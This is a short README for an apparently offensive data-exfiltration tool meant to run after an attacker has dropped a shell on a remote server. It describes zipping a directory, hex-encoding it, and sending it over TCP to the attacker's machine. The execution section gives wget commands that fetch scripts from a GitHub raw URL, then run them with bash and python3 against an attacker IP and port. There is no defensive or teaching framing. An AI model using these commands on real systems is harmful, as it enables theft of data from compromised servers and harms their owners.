# scrape tool

## purpose
- this tool is intended to be executed after you drop a shell in a remote server, but without root permissions, or in the scenario when there is no tools such as scp.

## instructions
- tar, and zip given, and readable directory.
- send it to public, or local machine.


##strategies
- those scripts are supposed to package everything under given directory, zip, then translate it to hex form to be read through the browser.
- open TCP connection to my local machine, and transfer everything.

## execution
wget raw.githubusercontent.com/ertosns/scrap/main/scrap.sh
bash scrap.sh
wget raw.githubusercontent.com/ertosns/scrap/main/rscrap.py
python3 ./rscrap.py -t c -a {IP} -p {PORT}

## notes
- if case you don't know the ip of the target machine you have to set your router to 'port forward' the port set in the local server.
